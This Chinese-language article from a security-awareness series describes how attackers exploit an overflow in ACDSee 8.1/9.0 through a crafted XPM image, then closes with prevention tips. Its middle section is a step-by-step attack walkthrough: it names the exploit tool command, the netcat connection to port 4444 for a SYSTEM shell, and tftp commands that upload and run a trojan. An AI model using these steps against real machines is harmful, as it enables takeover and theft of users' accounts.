如果給你一張圖片,並告訴你它可以黑你,你首先想到的是不是這張圖片捆綁了木馬?你會這麼想不無道理,因為這種古老的圖片抓雞法大多的變化都是在捆綁木馬上,幾乎沒有打過圖片的主意。但是這種全新超隱蔽的圖片抓雞法,在今年9月誕生了,在黑客圈中廣為流傳。它利用的就是ACDSee軟件(8.1和9.0)。在裝機時一般都會預裝一些常用軟件,不少朋友可能就裝有ACDSee軟件,這樣就給了黑客可乘之機。你也許會有疑問,不捆綁木馬,圖片是怎麼黑我的?看完本文,你就全明白了。
隱蔽在ACDSee圖片中的黑手
普通的圖片抓雞法就是在圖片上捆綁木馬,然後再傳播。這種方法雖然還有人用,但是成功率已經不高了,因為很容易第一時間就被發現。
現在,一種最新的圖片抓雞法正在黑客圈中流傳,它的原理就是利用數字圖像處理軟件ACDSeeID_X.apl插件在處理內部結構錯誤的XPM文件時,如果部分字符串大於4096字節的話就會觸發溢出。
黑客首先利用最近才在網絡上流傳的專用工具創建一張特殊圖片,接著通過各種方法將該圖片發送出去。用戶受騙打開了該圖片就會激活4444端口,黑客就可以通過溢出上傳木馬程序。一旦上傳的木馬程序成功運行後,用戶的電腦就會變成“肉雞”,游戲賬號、QQ等就會被盜。
ACDSee是怎樣被用來抓雞的
1.創建特殊圖片
點擊開始菜單中的“運行”命令,輸入“cmd”打開命令提示符窗口,然後跳轉到ACDSee漏洞利用工具的所在目錄。tw.wingWit.CoM首先輸入該工具名稱查看其使用方法,從中看到該工具有兩種使用方法。這裡我們輸入:xmp 1 test.xmp回車(圖1),這樣即可創建一張特殊圖片。
2.盜取System權限
首先將圖片文件發送出去,當用戶雙擊打開該文件時,就會在遠程系統打開4444的端口。現在打開另外一個命令提示符窗口,使用命令“nc -vv 遠程IP地址 4444”來進行連接。這時用黑客工具NC就會得到溢出的結果並獲得System的權限(圖2)。
3.上傳木馬抓雞
現在先准備一個木馬程序mm.exe,接著運行Tftpd32來架設一個服務器。點擊“設置”按鈕設置木馬的所在目錄以及本機IP地址就可以了。
現在切換到System權限的命令提示符窗口,直接輸入“tftp -i 本地IP get 遠程IP mm.exe”即可。上傳完成後運行“start mm.exe”命令執行木馬程序,連接成功後肉雞就到手了,以後就可以為所欲為了。
防范技巧
技巧1:不要隨便接收陌生人的任何文件,也不要下載那些不知情的文件。很多人以為只有可疑的應用程序才有危險,實際上任何文件都可能成為黑客入侵的幫手。
技巧2:將系統中的ACDSee更新到9.1以上版本(8.1和9.0版本的有這個漏洞),或一些經典但較老的軟件版本。因為最新的軟件版本已經修復了該漏洞,而老的版本並不存在該漏洞。
技巧3:利用系統自帶的網絡防火牆或者第三方的網絡防火牆,對溢出時利用的4444端口進行封堵。這樣就算是漏洞被激活,也不可能被黑客所控制利用。
防抓雞系列小結
通過這麼多期抓雞系列的介紹,我們可以看到黑客抓雞的手法靈活多變,既有利用常用軟件溢出抓雞的,又有通過端口抓雞的,還有巧用迅雷發布抓雞的。不管抓雞方式怎麼變,防范的思路基本上變化不大。
首先要確保各種系統和常用軟件漏洞的修補,這段時間很多黑客都在尋找常用軟件的漏洞,大家一定要注意常用軟件的更新。其次,要及時更新殺毒軟件並使用一些查殺木馬能力較強的安全工具,如EWIDO(下載地址:http://www.cpcw.com/bzsoft)。最後,一定要記住不放心的文件不打開,不正規的網站不去,提高安全意識。
From:http://tw.wingwit.com/Article/Network/201309/397.html